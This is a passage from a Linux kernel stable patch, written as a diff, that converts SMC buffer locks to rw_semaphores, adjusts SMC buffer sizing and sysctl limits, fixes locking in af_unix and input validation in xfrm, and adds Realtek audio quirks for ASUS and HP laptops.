+@@ -2122,7 +2123,7 @@ static int _smcr_buf_map_lgr(struct smc_link *lnk, struct mutex *lock,
+ 			goto out;
+ 	}
+ out:
+-	mutex_unlock(lock);
++	up_write(lock);
+ 	return rc;
+ }
+ 
+@@ -2155,37 +2156,37 @@ int smcr_buf_reg_lgr(struct smc_link *lnk)
+ 	int i, rc = 0;
+ 
+ 	/* reg all RMBs for a new link */
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->rmbs[i], list) {
+ 			if (!buf_desc->used)
+ 				continue;
+ 			rc = smcr_link_reg_buf(lnk, buf_desc);
+ 			if (rc) {
+-				mutex_unlock(&lgr->rmbs_lock);
++				up_write(&lgr->rmbs_lock);
+ 				return rc;
+ 			}
+ 		}
+ 	}
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 
+ 	if (lgr->buf_type == SMCR_PHYS_CONT_BUFS)
+ 		return rc;
+ 
+ 	/* reg all vzalloced sndbufs for a new link */
+-	mutex_lock(&lgr->sndbufs_lock);
++	down_write(&lgr->sndbufs_lock);
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->sndbufs[i], list) {
+ 			if (!buf_desc->used || !buf_desc->is_vm)
+ 				continue;
+ 			rc = smcr_link_reg_buf(lnk, buf_desc);
+ 			if (rc) {
+-				mutex_unlock(&lgr->sndbufs_lock);
++				up_write(&lgr->sndbufs_lock);
+ 				return rc;
+ 			}
+ 		}
+ 	}
+-	mutex_unlock(&lgr->sndbufs_lock);
++	up_write(&lgr->sndbufs_lock);
+ 	return rc;
+ }
+ 
+@@ -2304,31 +2305,30 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 	struct smc_connection *conn = &smc->conn;
+ 	struct smc_link_group *lgr = conn->lgr;
+ 	struct list_head *buf_list;
+-	int bufsize, bufsize_short;
++	int bufsize, bufsize_comp;
++	struct rw_semaphore *lock;	/* lock buffer list */
+ 	bool is_dgraded = false;
+-	struct mutex *lock;	/* lock buffer list */
+-	int sk_buf_size;
+ 
+ 	if (is_rmb)
+ 		/* use socket recv buffer size (w/o overhead) as start value */
+-		sk_buf_size = smc->sk.sk_rcvbuf;
++		bufsize = smc->sk.sk_rcvbuf / 2;
+ 	else
+ 		/* use socket send buffer size (w/o overhead) as start value */
+-		sk_buf_size = smc->sk.sk_sndbuf;
++		bufsize = smc->sk.sk_sndbuf / 2;
+ 
+-	for (bufsize_short = smc_compress_bufsize(sk_buf_size, is_smcd, is_rmb);
+-	     bufsize_short >= 0; bufsize_short--) {
++	for (bufsize_comp = smc_compress_bufsize(bufsize, is_smcd, is_rmb);
++	     bufsize_comp >= 0; bufsize_comp--) {
+ 		if (is_rmb) {
+ 			lock = &lgr->rmbs_lock;
+-			buf_list = &lgr->rmbs[bufsize_short];
++			buf_list = &lgr->rmbs[bufsize_comp];
+ 		} else {
+ 			lock = &lgr->sndbufs_lock;
+-			buf_list = &lgr->sndbufs[bufsize_short];
++			buf_list = &lgr->sndbufs[bufsize_comp];
+ 		}
+-		bufsize = smc_uncompress_bufsize(bufsize_short);
++		bufsize = smc_uncompress_bufsize(bufsize_comp);
+ 
+ 		/* check for reusable slot in the link group */
+-		buf_desc = smc_buf_get_slot(bufsize_short, lock, buf_list);
++		buf_desc = smc_buf_get_slot(bufsize_comp, lock, buf_list);
+ 		if (buf_desc) {
+ 			buf_desc->is_dma_need_sync = 0;
+ 			SMC_STAT_RMB_SIZE(smc, is_smcd, is_rmb, bufsize);
+@@ -2354,9 +2354,9 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 		SMC_STAT_RMB_ALLOC(smc, is_smcd, is_rmb);
+ 		SMC_STAT_RMB_SIZE(smc, is_smcd, is_rmb, bufsize);
+ 		buf_desc->used = 1;
+-		mutex_lock(lock);
++		down_write(lock);
+ 		list_add(&buf_desc->list, buf_list);
+-		mutex_unlock(lock);
++		up_write(lock);
+ 		break; /* found */
+ 	}
+ 
+@@ -2372,8 +2372,8 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 
+ 	if (is_rmb) {
+ 		conn->rmb_desc = buf_desc;
+-		conn->rmbe_size_short = bufsize_short;
+-		smc->sk.sk_rcvbuf = bufsize;
++		conn->rmbe_size_comp = bufsize_comp;
++		smc->sk.sk_rcvbuf = bufsize * 2;
+ 		atomic_set(&conn->bytes_to_rcv, 0);
+ 		conn->rmbe_update_limit =
+ 			smc_rmb_wnd_update_limit(buf_desc->len);
+@@ -2381,7 +2381,7 @@ static int __smc_buf_create(struct smc_sock *smc, bool is_smcd, bool is_rmb)
+ 			smc_ism_set_conn(conn); /* map RMB/smcd_dev to conn */
+ 	} else {
+ 		conn->sndbuf_desc = buf_desc;
+-		smc->sk.sk_sndbuf = bufsize;
++		smc->sk.sk_sndbuf = bufsize * 2;
+ 		atomic_set(&conn->sndbuf_space, bufsize);
+ 	}
+ 	return 0;
+@@ -2430,9 +2430,9 @@ int smc_buf_create(struct smc_sock *smc, bool is_smcd)
+ 	/* create rmb */
+ 	rc = __smc_buf_create(smc, is_smcd, true);
+ 	if (rc) {
+-		mutex_lock(&smc->conn.lgr->sndbufs_lock);
++		down_write(&smc->conn.lgr->sndbufs_lock);
+ 		list_del(&smc->conn.sndbuf_desc->list);
+-		mutex_unlock(&smc->conn.lgr->sndbufs_lock);
++		up_write(&smc->conn.lgr->sndbufs_lock);
+ 		smc_buf_free(smc->conn.lgr, false, smc->conn.sndbuf_desc);
+ 		smc->conn.sndbuf_desc = NULL;
+ 	}
+diff --git a/net/smc/smc_core.h b/net/smc/smc_core.h
+index 285f9bd8e232e..6051d92270130 100644
+--- a/net/smc/smc_core.h
++++ b/net/smc/smc_core.h
+@@ -252,9 +252,9 @@ struct smc_link_group {
+ 	unsigned short		vlan_id;	/* vlan id of link group */
+ 
+ 	struct list_head	sndbufs[SMC_RMBE_SIZES];/* tx buffers */
+-	struct mutex		sndbufs_lock;	/* protects tx buffers */
++	struct rw_semaphore	sndbufs_lock;	/* protects tx buffers */
+ 	struct list_head	rmbs[SMC_RMBE_SIZES];	/* rx buffers */
+-	struct mutex		rmbs_lock;	/* protects rx buffers */
++	struct rw_semaphore	rmbs_lock;	/* protects rx buffers */
+ 
+ 	u8			id[SMC_LGR_ID_SIZE];	/* unique lgr id */
+ 	struct delayed_work	free_work;	/* delayed freeing of an lgr */
+diff --git a/net/smc/smc_llc.c b/net/smc/smc_llc.c
+index 760f8bbff822e..fcb24a0ccf761 100644
+--- a/net/smc/smc_llc.c
++++ b/net/smc/smc_llc.c
+@@ -611,7 +611,7 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 
+ 	prim_lnk_idx = link->link_idx;
+ 	lnk_idx = link_new->link_idx;
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	ext->num_rkeys = lgr->conns_num;
+ 	if (!ext->num_rkeys)
+ 		goto out;
+@@ -631,7 +631,7 @@ static int smc_llc_fill_ext_v2(struct smc_llc_msg_add_link_v2_ext *ext,
+ 	}
+ 	len += i * sizeof(ext->rt[0]);
+ out:
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 	return len;
+ }
+ 
+@@ -892,7 +892,7 @@ static int smc_llc_cli_rkey_exchange(struct smc_link *link,
+ 	int rc = 0;
+ 	int i;
+ 
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	num_rkeys_send = lgr->conns_num;
+ 	buf_pos = smc_llc_get_first_rmb(lgr, &buf_lst);
+ 	do {
+@@ -919,7 +919,7 @@ static int smc_llc_cli_rkey_exchange(struct smc_link *link,
+ 			break;
+ 	} while (num_rkeys_send || num_rkeys_recv);
+ 
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 	return rc;
+ }
+ 
+@@ -1002,14 +1002,14 @@ static void smc_llc_save_add_link_rkeys(struct smc_link *link,
+ 	ext = (struct smc_llc_msg_add_link_v2_ext *)((u8 *)lgr->wr_rx_buf_v2 +
+ 						     SMC_WR_TX_SIZE);
+ 	max = min_t(u8, ext->num_rkeys, SMC_LLC_RKEYS_PER_MSG_V2);
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	for (i = 0; i < max; i++) {
+ 		smc_rtoken_set(lgr, link->link_idx, link_new->link_idx,
+ 			       ext->rt[i].rmb_key,
+ 			       ext->rt[i].rmb_vaddr_new,
+ 			       ext->rt[i].rmb_key_new);
+ 	}
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ }
+ 
+ static void smc_llc_save_add_link_info(struct smc_link *link,
+@@ -1316,7 +1316,7 @@ static int smc_llc_srv_rkey_exchange(struct smc_link *link,
+ 	int rc = 0;
+ 	int i;
+ 
+-	mutex_lock(&lgr->rmbs_lock);
++	down_write(&lgr->rmbs_lock);
+ 	num_rkeys_send = lgr->conns_num;
+ 	buf_pos = smc_llc_get_first_rmb(lgr, &buf_lst);
+ 	do {
+@@ -1341,7 +1341,7 @@ static int smc_llc_srv_rkey_exchange(struct smc_link *link,
+ 		smc_llc_flow_qentry_del(&lgr->llc_flow_lcl);
+ 	} while (num_rkeys_send || num_rkeys_recv);
+ out:
+-	mutex_unlock(&lgr->rmbs_lock);
++	up_write(&lgr->rmbs_lock);
+ 	return rc;
+ }
+ 
+diff --git a/net/smc/smc_sysctl.c b/net/smc/smc_sysctl.c
+index b6f79fabb9d3f..0b2a957ca5f5f 100644
+--- a/net/smc/smc_sysctl.c
++++ b/net/smc/smc_sysctl.c
+@@ -21,6 +21,10 @@
+ 
+ static int min_sndbuf = SMC_BUF_MIN_SIZE;
+ static int min_rcvbuf = SMC_BUF_MIN_SIZE;
++static int max_sndbuf = INT_MAX / 2;
++static int max_rcvbuf = INT_MAX / 2;
++static const int net_smc_wmem_init = (64 * 1024);
++static const int net_smc_rmem_init = (64 * 1024);
+ 
+ static struct ctl_table smc_table[] = {
+ 	{
+@@ -53,6 +57,7 @@ static struct ctl_table smc_table[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec_minmax,
+ 		.extra1		= &min_sndbuf,
++		.extra2		= &max_sndbuf,
+ 	},
+ 	{
+ 		.procname	= "rmem",
+@@ -61,6 +66,7 @@ static struct ctl_table smc_table[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec_minmax,
+ 		.extra1		= &min_rcvbuf,
++		.extra2		= &max_rcvbuf,
+ 	},
+ 	{  }
+ };
+@@ -88,8 +94,8 @@ int __net_init smc_sysctl_net_init(struct net *net)
+ 	net->smc.sysctl_autocorking_size = SMC_AUTOCORKING_DEFAULT_SIZE;
+ 	net->smc.sysctl_smcr_buf_type = SMCR_PHYS_CONT_BUFS;
+ 	net->smc.sysctl_smcr_testlink_time = SMC_LLC_TESTLINK_DEFAULT_TIME;
+-	WRITE_ONCE(net->smc.sysctl_wmem, READ_ONCE(net->ipv4.sysctl_tcp_wmem[1]));
+-	WRITE_ONCE(net->smc.sysctl_rmem, READ_ONCE(net->ipv4.sysctl_tcp_rmem[1]));
++	WRITE_ONCE(net->smc.sysctl_wmem, net_smc_wmem_init);
++	WRITE_ONCE(net->smc.sysctl_rmem, net_smc_rmem_init);
+ 
+ 	return 0;
+ 
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 78fa620a63981..ca31847a6c70c 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2290,6 +2290,7 @@ static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page,
+ 
+ 	if (false) {
+ alloc_skb:
++		spin_unlock(&other->sk_receive_queue.lock);
+ 		unix_state_unlock(other);
+ 		mutex_unlock(&unix_sk(other)->iolock);
+ 		newskb = sock_alloc_send_pskb(sk, 0, 0, flags & MSG_DONTWAIT,
+@@ -2329,6 +2330,7 @@ alloc_skb:
+ 		init_scm = false;
+ 	}
+ 
++	spin_lock(&other->sk_receive_queue.lock);
+ 	skb = skb_peek_tail(&other->sk_receive_queue);
+ 	if (tail && tail == skb) {
+ 		skb = newskb;
+@@ -2359,14 +2361,11 @@ alloc_skb:
+ 	refcount_add(size, &sk->sk_wmem_alloc);
+ 
+ 	if (newskb) {
+-		err = unix_scm_to_skb(&scm, skb, false);
+-		if (err)
+-			goto err_state_unlock;
+-		spin_lock(&other->sk_receive_queue.lock);
++		unix_scm_to_skb(&scm, skb, false);
+ 		__skb_queue_tail(&other->sk_receive_queue, newskb);
+-		spin_unlock(&other->sk_receive_queue.lock);
+ 	}
+ 
++	spin_unlock(&other->sk_receive_queue.lock);
+ 	unix_state_unlock(other);
+ 	mutex_unlock(&unix_sk(other)->iolock);
+ 
+diff --git a/net/xfrm/xfrm_compat.c b/net/xfrm/xfrm_compat.c
+index 8cbf45a8bcdc2..655fe4ff86212 100644
+--- a/net/xfrm/xfrm_compat.c
++++ b/net/xfrm/xfrm_compat.c
+@@ -108,7 +108,7 @@ static const struct nla_policy compat_policy[XFRMA_MAX+1] = {
+ 	[XFRMA_ALG_COMP]	= { .len = sizeof(struct xfrm_algo) },
+ 	[XFRMA_ENCAP]		= { .len = sizeof(struct xfrm_encap_tmpl) },
+ 	[XFRMA_TMPL]		= { .len = sizeof(struct xfrm_user_tmpl) },
+-	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_sec_ctx) },
++	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_user_sec_ctx) },
+ 	[XFRMA_LTIME_VAL]	= { .len = sizeof(struct xfrm_lifetime_cur) },
+ 	[XFRMA_REPLAY_VAL]	= { .len = sizeof(struct xfrm_replay_state) },
+ 	[XFRMA_REPLAY_THRESH]	= { .type = NLA_U32 },
+diff --git a/net/xfrm/xfrm_interface_core.c b/net/xfrm/xfrm_interface_core.c
+index 94a3609548b11..d71dbe822096a 100644
+--- a/net/xfrm/xfrm_interface_core.c
++++ b/net/xfrm/xfrm_interface_core.c
+@@ -528,8 +528,8 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_IPV6):
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		if (!dst) {
+ 			fl.u.ip6.flowi6_oif = dev->ifindex;
+ 			fl.u.ip6.flowi6_flags |= FLOWI_FLAG_ANYSRC;
+@@ -543,8 +543,8 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		}
+ 		break;
+ 	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+ 		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET);
+ 		if (!dst) {
+ 			struct rtable *rt;
+ 
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index 2d68a173b2273..d042ca01211fa 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -615,7 +615,7 @@ static void xfrm_update_ae_params(struct xfrm_state *x, struct nlattr **attrs,
+ 	struct nlattr *rt = attrs[XFRMA_REPLAY_THRESH];
+ 	struct nlattr *mt = attrs[XFRMA_MTIMER_THRESH];
+ 
+-	if (re) {
++	if (re && x->replay_esn && x->preplay_esn) {
+ 		struct xfrm_replay_state_esn *replay_esn;
+ 		replay_esn = nla_data(re);
+ 		memcpy(x->replay_esn, replay_esn,
+@@ -1250,6 +1250,15 @@ static int xfrm_dump_sa(struct sk_buff *skb, struct netlink_callback *cb)
+ 					 sizeof(*filter), GFP_KERNEL);
+ 			if (filter == NULL)
+ 				return -ENOMEM;
++
++			/* see addr_match(), (prefix length >> 5) << 2
++			 * will be used to compare xfrm_address_t
++			 */
++			if (filter->splen > (sizeof(xfrm_address_t) << 3) ||
++			    filter->dplen > (sizeof(xfrm_address_t) << 3)) {
++				kfree(filter);
++				return -EINVAL;
++			}
+ 		}
+ 
+ 		if (attrs[XFRMA_PROTO])
+@@ -2960,7 +2969,7 @@ const struct nla_policy xfrma_policy[XFRMA_MAX+1] = {
+ 	[XFRMA_ALG_COMP]	= { .len = sizeof(struct xfrm_algo) },
+ 	[XFRMA_ENCAP]		= { .len = sizeof(struct xfrm_encap_tmpl) },
+ 	[XFRMA_TMPL]		= { .len = sizeof(struct xfrm_user_tmpl) },
+-	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_sec_ctx) },
++	[XFRMA_SEC_CTX]		= { .len = sizeof(struct xfrm_user_sec_ctx) },
+ 	[XFRMA_LTIME_VAL]	= { .len = sizeof(struct xfrm_lifetime_cur) },
+ 	[XFRMA_REPLAY_VAL]	= { .len = sizeof(struct xfrm_replay_state) },
+ 	[XFRMA_REPLAY_THRESH]	= { .type = NLA_U32 },
+@@ -2980,6 +2989,7 @@ const struct nla_policy xfrma_policy[XFRMA_MAX+1] = {
+ 	[XFRMA_SET_MARK]	= { .type = NLA_U32 },
+ 	[XFRMA_SET_MARK_MASK]	= { .type = NLA_U32 },
+ 	[XFRMA_IF_ID]		= { .type = NLA_U32 },
++	[XFRMA_MTIMER_THRESH]   = { .type = NLA_U32 },
+ };
+ EXPORT_SYMBOL_GPL(xfrma_policy);
+ 
+diff --git a/sound/hda/hdac_regmap.c b/sound/hda/hdac_regmap.c
+index fe3587547cfec..39610a15bcc98 100644
+--- a/sound/hda/hdac_regmap.c
++++ b/sound/hda/hdac_regmap.c
+@@ -597,10 +597,9 @@ EXPORT_SYMBOL_GPL(snd_hdac_regmap_update_raw_once);
+  */
+ void snd_hdac_regmap_sync(struct hdac_device *codec)
+ {
+-	if (codec->regmap) {
+-		mutex_lock(&codec->regmap_lock);
++	mutex_lock(&codec->regmap_lock);
++	if (codec->regmap)
+ 		regcache_sync(codec->regmap);
+-		mutex_unlock(&codec->regmap_lock);
+-	}
++	mutex_unlock(&codec->regmap_lock);
+ }
+ EXPORT_SYMBOL_GPL(snd_hdac_regmap_sync);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f93b68a2a8393..aa475154c582f 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7081,6 +7081,8 @@ enum {
+ 	ALC285_FIXUP_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_HEADSET_MIC,
++	ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1,
++	ALC285_FIXUP_ASUS_I2C_HEADSET_MIC,
+ 	ALC280_FIXUP_HP_HEADSET_MIC,
+ 	ALC221_FIXUP_HP_FRONT_MIC,
+ 	ALC292_FIXUP_TPT460,
+@@ -7136,6 +7138,10 @@ enum {
+ 	ALC294_FIXUP_ASUS_DUAL_SPK,
+ 	ALC285_FIXUP_THINKPAD_X1_GEN7,
+ 	ALC285_FIXUP_THINKPAD_HEADSET_JACK,
++	ALC294_FIXUP_ASUS_ALLY,
++	ALC294_FIXUP_ASUS_ALLY_PINS,
++	ALC294_FIXUP_ASUS_ALLY_VERBS,
++	ALC294_FIXUP_ASUS_ALLY_SPEAKER,
+ 	ALC294_FIXUP_ASUS_HPE,
+ 	ALC294_FIXUP_ASUS_COEF_1B,
+ 	ALC294_FIXUP_ASUS_GX502_HP,
+@@ -8069,6 +8075,22 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1
+ 	},
++	[ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_speaker2_to_dac1,
++		.chained = true,
++		.chain_id = ALC287_FIXUP_CS35L41_I2C_2
++	},
++	[ALC285_FIXUP_ASUS_I2C_HEADSET_MIC] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 },
++			{ 0x1b, 0x03a11c30 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1
++	},
+ 	[ALC256_FIXUP_DELL_INSPIRON_7559_SUBWOOFER] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = (const struct hda_pintbl[]) {
+@@ -8450,6 +8472,47 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC294_FIXUP_SPK2_TO_DAC1
+ 	},
++	[ALC294_FIXUP_ASUS_ALLY] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = cs35l41_fixup_i2c_two,
++		.chained = true,
++		.chain_id = ALC294_FIXUP_ASUS_ALLY_PINS
++	},
++	[ALC294_FIXUP_ASUS_ALLY_PINS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 },
++			{ 0x1a, 0x03a11c30 },
++			{ 0x21, 0x03211420 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC294_FIXUP_ASUS_ALLY_VERBS
++	},
++	[ALC294_FIXUP_ASUS_ALLY_VERBS] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x45 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x5089 },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x46 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x0004 },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x47 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0xa47a },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x49 },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x0049},
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x4a },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x201b },
++			{ 0x20, AC_VERB_SET_COEF_INDEX, 0x6b },
++			{ 0x20, AC_VERB_SET_PROC_COEF, 0x4278},
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC294_FIXUP_ASUS_ALLY_SPEAKER
++	},
++	[ALC294_FIXUP_ASUS_ALLY_SPEAKER] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_speaker2_to_dac1,
++	},
+ 	[ALC285_FIXUP_THINKPAD_X1_GEN7] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_thinkpad_x1_gen7,
+@@ -9533,7 +9596,13 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b97, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+-	SND_PCI_QUIRK(0x103c, 0x8c26, "HP HP EliteBook 800G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c46, "HP EliteBook 830 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c47, "HP EliteBook 840 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c48, "HP EliteBook 860 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c49, "HP Elite x360 830 2-in-1 G11", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+@@ -9553,15 +9622,19 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1313, "Asus K42JZ", ALC269VB_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x13b0, "ASUS Z550SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
++	SND_PCI_QUIRK(0x1043, 0x1433, "ASUS GX650P", ALC285_FIXUP_ASUS_I2C_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1043, 0x1463, "Asus GA402X", ALC285_FIXUP_ASUS_I2C_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1473, "ASUS GU604V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1483, "ASUS GU603V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
++	SND_PCI_QUIRK(0x1043, 0x1573, "ASUS GZ301V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1740, "ASUS UX430UA", ALC295_FIXUP_ASUS_DACS),
+ 	SND_PCI_QUIRK(0x1043, 0x17d1, "ASUS UX431FL", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x17f3, "ROG Ally RC71L_RC71L", ALC294_FIXUP_ASUS_ALLY),
+ 	SND_PCI_QUIRK(0x1043, 0x1881, "ASUS Zephyrus S/M", ALC294_FIXUP_ASUS_GX502_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x18b1, "Asus MJ401TA", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x18f1, "Asus FX505DT", ALC256_FIXUP_ASUS_HEADSET_MIC),
+@@ -10547,6 +10620,7 @@ static int patch_alc269(struct hda_codec *codec)
+ 	spec = codec->spec;
+ 	spec->gen.shared_mic_vref_pin = 0x18;
+ 	codec->power_save_node = 0;
++	spec->en_3kpull_low = true;
+ 
+ #ifdef CONFIG_PM
+ 	codec->patch_ops.suspend = alc269_suspend;
+@@ -10629,14 +10703,16 @@ static int patch_alc269(struct hda_codec *codec)
+ 		spec->shutup = alc256_shutup;
+ 		spec->init_hook = alc256_init;
+ 		spec->gen.mixer_nid = 0; /* ALC256 does not have any loopback mixer path */
+-		if (codec->bus->pci->vendor == PCI_VENDOR_ID_AMD)
+-			spec->en_3kpull_low = true;
++		if (codec->core.vendor_id == 0x10ec0236 &&
++		    codec->bus->pci->vendor != PCI_VENDOR_ID_AMD)
++			spec->en_3kpull_low = false;
+ 		break;
+ 	case 0x10ec0257:
+ 		spec->codec_variant = ALC269_TYPE_ALC257;
+ 		spec->shutup = alc256_shutup;
+ 		spec->init_hook = alc256_init;
+ 		spec->gen.mixer_nid = 0;
++		spec->en_3kpull_low = false;
+ 		break;
+ 	case 0x10ec0215:
+ 	case 0x10ec0245:
+@@ -11268,6 +11344,7 @@ enum {
+ 	ALC897_FIXUP_HP_HSMIC_VERB,
+ 	ALC897_FIXUP_LENOVO_HEADSET_MODE,
+ 	ALC897_FIXUP_HEADSET_MIC_PIN2,
++	ALC897_FIXUP_UNIS_H3C_X500S,
+ };
+ 
+ static const struct hda_fixup alc662_fixups[] = {
+@@ -11707,6 +11784,13 @@ static const struct hda_fixup alc662_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC897_FIXUP_LENOVO_HEADSET_MODE
+ 	},
++	[ALC897_FIXUP_UNIS_H3C_X500S] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{ 0x14, AC_VERB_SET_EAPD_BTLENABLE, 0 },
++			{}
++		},
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
